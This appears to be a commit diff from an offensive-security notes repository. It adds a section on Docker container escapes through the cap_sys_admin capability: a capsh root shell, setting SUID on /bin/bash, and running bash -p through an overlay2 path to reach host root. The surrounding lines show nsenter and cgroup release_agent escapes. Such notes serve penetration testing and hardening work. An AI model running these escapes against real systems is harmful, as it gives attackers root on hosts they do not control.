whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

bump

This commit is contained in:
whackx 2023-05-05 18:27:45 +02:00
parent b15d5ea2ba
commit 840daf84da
1 changed files with 16 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
Exploits/Containers/Docker.md
View File

@ -93,6 +93,9 @@ nsenter --target 1 --mount sh
``` ```
## Misconfiguration ## Misconfiguration
### capabilities
* Privileged container connect to the host directly, not through the docker engine * Privileged container connect to the host directly, not through the docker engine
* Execution of bins on the host from libs inside the container is possible * Execution of bins on the host from libs inside the container is possible
```sh ```sh
@ -115,6 +118,19 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
``` ```
* The file may appear outside the container on the host system * The file may appear outside the container on the host system
### cap_admin
`cap_sys_admin` provides the ability to spawn a root shell inside the container
```sh
capsh --gid=0 --uid=0 --
```
Further, if there is access to the host this capability can be used to set `chmod u+s /bin/bash` and list the available mounts. The mounts can be listed `findmnt`.
Resulting in a useable root bash on the host via executing it on the path of the docker volume, e.g.
```sh
/var/lib/docker/overlay2/l/randomhash/bin/bash -p
```
## Check fdisk ## Check fdisk
* `fdisk -l` and `lsblk`, host bulk device may be exposed * `fdisk -l` and `lsblk`, host bulk device may be exposed